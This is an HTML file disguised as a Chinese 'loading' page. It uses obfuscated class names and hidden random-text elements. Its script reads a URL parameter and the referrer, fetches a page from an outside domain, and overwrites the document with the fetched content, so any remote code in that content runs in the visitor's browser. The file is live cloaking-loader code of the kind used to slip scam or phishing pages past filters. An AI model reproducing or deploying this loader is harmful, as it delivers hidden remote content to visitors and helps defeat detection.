<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .X0zznK0W {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .X0zznK0W .WWnYgVEK {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .X0zznK0W .content {
            line-height: 50px;
            text-align: center
        }

        .X0zznK0W .img {
            width: 100%
        }

        .X0zznK0W .N0lZH6euG2 {
            text-align: center
        }

        .X0zznK0W .N0lZH6euG2 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .X0zznK0W .N0lZH6euG2 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .X0zznK0W .N0lZH6euG2 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .X0zznK0W .N0lZH6euG2 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .X0zznK0W .N0lZH6euG2 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .X0zznK0W .N0lZH6euG2 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .X0zznK0W .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function UxaUCAC0E5cZ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var IXhBfsX = UxaUCAC0E5cZ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ IXhBfsX +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ IXhBfsX +".html?a=share";
		}
		
        TqxupR=url+"#"+new Date().getTime();
        TqxupR && function() {
            $.get(TqxupR, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >a7VO0HgQoR2HhYbToDoJ93J5</b>
<b style='display:none' >a7VO0HgQoR2HhYbToDoJ93J5</b>
<a  href='#' style='display:none'>sq87xruuP5Vb9dUK5YRxGgIBwD4nWRKlo1hn7uPKElNyCRxYkS90tDnb8cSCoh8uGgN7cxKupHBrX9CI8sL93LcH1E6OOo6LE</a>
<img  src='' style='display:none'>
<p  style='display:none'>TdUwh9QZh2EY</p>
<p  style='display:none'>TdUwh9QZh2EY</p>
<span style='display:none'>vRk00hyceLprZ5mpehGg</span>
<a  href='#' style='display:none'>sq87xruuP5Vb9dUK5YRxGgIBwD4nWRKlo1hn7uPKElNyCRxYkS90tDnb8cSCoh8uGgN7cxKupHBrX9CI8sL93LcH1E6OOo6LE</a><div class="X0zznK0W">
    <div class="WWnYgVEK">
        <div class="N0lZH6euG2">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >qt0W1xJY25hvqx8n6t2RIVHtSoqggfHFD6ozMBM8HMpMuS5tGukmBPFehLiuZe8q2ZjUR8dlhSXHlCSEq8gU9682lkyYZUhS9HV</h1>
<img  src='' style='display:none'>
<div style='display:none'>isjiTmaseeJCxugsaJRMoMrn4oCmxPOY95zMdUhd6SmBPyXbyFEjqXHVsCA3D1mux</div>
<div style='display:none'>isjiTmaseeJCxugsaJRMoMrn4oCmxPOY95zMdUhd6SmBPyXbyFEjqXHVsCA3D1mux</div>
<a  href='#' style='display:none'>hcq9btV8HbXxd1MeVWH5lvuLg6JxX7i3JHmDnxh4TeDptV938OjKYkk5CcFhf3l2f5hqc2hsnhwWgMriXJp6g4htzb0zB70ul8u</a>
<img  src='' style='display:none'>
<p  style='display:none'>vkyTsdt9KmbMkFGPrxHXZPLOiuVuAGrrOwEICstirpZFdRckmm9hWwN6gQ</p>
<b style='display:none' >h847lKbco9eDXBj8y3Uxpt1MdobwYeVsrmdlZ2WwLSZjwNMIj5kM</b>
<h1 style='display:none' >qt0W1xJY25hvqx8n6t2RIVHtSoqggfHFD6ozMBM8HMpMuS5tGukmBPFehLiuZe8q2ZjUR8dlhSXHlCSEq8gU9682lkyYZUhS9HV</h1></body>
</html>